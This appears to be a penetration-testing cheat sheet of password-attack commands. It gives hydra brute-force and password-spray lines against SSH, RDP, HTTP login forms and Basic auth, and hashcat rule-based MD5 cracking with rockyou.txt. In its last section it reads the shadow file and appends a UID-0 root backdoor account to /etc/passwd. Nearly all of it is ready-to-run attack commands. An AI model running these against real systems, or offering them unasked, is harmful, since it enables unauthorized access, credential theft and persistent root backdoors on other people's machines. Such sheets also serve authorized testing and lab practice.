SSH

# Single user brute-force
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>

# Password spray
hydra -L users.txt -p 'knownPassword123' ssh://<IP>

RDP

Spray a known password across users:

hydra -L users.txt -p 'password' rdp://<IP>

HTTP POST Login Form

# Capture login fields and failed string using Burp or browser DevTools.
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:username=<user>&password=^PASS^:Invalid login"

HTTP Basic Authentication

hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get /

Password Mutation with Hashcat Rules

# Appending Characters
echo '$1$@$3$$$5' > append.rule
echo '056df33e47082c77148dba529212d50a' > hash.txt
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r append.rule --force

# all letters uppercase and duplicating the password.
echo 'u d' > demo5.rule
echo '19adc0e8921336d08502c039dc297ff8' > hash5.txt
hashcat -m 0 hash5.txt /usr/share/wordlists/rockyou.txt -r demo5.rule --force

Shadow file insert

# print the shadow file, then:
unshadow passwd.txt shadow.txt > passwords.txt

# create your hash to insert
openssl passwd -1 -salt TOX password1
$1$TOX$V1fTLRVUzjgeX/CWDacOc0

# add this to the /etc/passwd file:
echo "toxsec:$1$TOX$V1fTLRVUzjgeX/CWDacOc0:0:0:root:/root:/bin/bash" >> /etc/passwd